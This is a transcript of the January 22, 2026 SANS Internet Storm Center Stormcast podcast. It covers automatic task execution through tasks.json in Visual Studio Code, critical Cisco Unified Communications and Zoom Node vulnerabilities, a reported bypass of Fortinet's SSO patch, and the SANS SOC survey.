Hello and welcome to the Thursday, January 22nd, 2026
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich and today I'm recording from
Jacksonville, Florida. And this episode is brought to you
by the SANS.edu Bachelor's Degree Program in Applied
Cybersecurity. In diaries today, we have Xavier and we
talk about the automatic script execution in Visual
Studio Code. Visual Studio Code is a development
environment. It's much more than a simple editor and like
most of these IDEs, it has the ability to execute code. One
way this is done in Visual Studio Code is by using a .vs
code directory and inside that a tasks.json file. What
happens is as Visual Studio Code opens a file, it checks
for this directory and the task.json file will then
define certain actions to execute on specific events,
like in the example that Xavier presents whenever a new
folder is opened. So that main attacker can easily smuggle
code as part of some project that they're offering for
example for download and then execute it inside the
developer's editor. This is a technique that has been used
in several attacks, so there's nothing really new. Similar
stuff has been done with Visual Studio Code extensions
for example. But I think the most important lesson here is
whenever you download like source code and then open it
in a complex environment like Visual Studio Code, well there
is a possibility that code is being executed, so you better
trust that code. Some development environments like
for example the ones developed by JetBrains that are very
popular will give you sort of a warning when you open a
file. It asks you well, you trust the file or not, which
will then trigger this behavior or keep it just in
sort of a normal editor mode where it doesn't execute any
code. Either way, whenever you edit code, make sure that you
trust the code and you may want to check for any
mechanisms like this, like these tasks.json file for
Visual Studio Code, but they look slightly different for
every development environment. And Cisco released several
patches today. The most noteworthy one is a critical
vulnerability in the Cisco Unified Communications
product. There's an entire sort of product family that is
sort of under this umbrella. They all suffer from this
vulnerability. Its rated critical CVSS score is a
little bit low, I think, for this vulnerability. A base
score of 8.2. The problem is that we have one of those
typical vulnerabilities where user input isn't properly
validated. It doesn't really state the exact nature of the
problem here, but it says that an unauthenticated attacker
could obtain user privileges and then later escalate them
to root. So basically lead to a complete system compromise,
which is why I think this may deserve a higher CSS score.
But it's not really clear if they're really talking about
the same vulnerability here or just two different
vulnerabilities chained together to get to the
complete root access on the device. Either way, patch your
setups. Then we have a critical vulnerability in Zoom
that has been patched. This one affects the Zoom node
multimedia routers, so not sort of the Zoom desktop
product. But it's critical and sort of interesting also
because it does allow operative code execution. So
that's why it has a CVSS score of 9.9 and should be quickly
patched. In order to exploit the vulnerability, a user and
attacker has to be a participant of a Zoom meeting
that is using this Zoom node multimedia router. And
Fortinet users are reporting that they're seeing successful
exploit attempts against Fortinet firewalls that are
perfectly patched, in particular patched against CVE
-2025-59718. A single sign-on vulnerability that was patched
back in December. And apparently what is going on
here is that a new variation of the exploit is able to
bypass the patch. Haven't seen any sort of official note from
Fortinet yet, but a user in the Fortinet read it that
quote communication with a Fortinet developer confirming
that the vulnerability is not really persists and is not
really fixed yet in 7.410. And there should soon be a 7.411
version coming out, as well as respective updates for 7.6 and
8.0. So keep looking out for that. In the meantime, just
sort of disabling the single sign-on feature works as a
workaround. That was the workaround that was also
recommended back when the vulnerability was originally
discovered and before it was patched in December. And SANS
is asking for your help with the 10th annual SOC survey.
It's sort of one of the big surveys that SANS does every
year. And yes, now for 10 years in a row. So if you're
working in a SOC or even if you're managing it, please
share your experience. This has been sort of one of the
bigger surveys that SANS does each year. It has been quite
helpful in the past. So please help us out here in just
answering a couple questions. Well, and that's it for today.
So thanks for listening. Thanks for liking and thanks
for subscribing to this podcast. And as always, talk
to you again tomorrow. Bye.
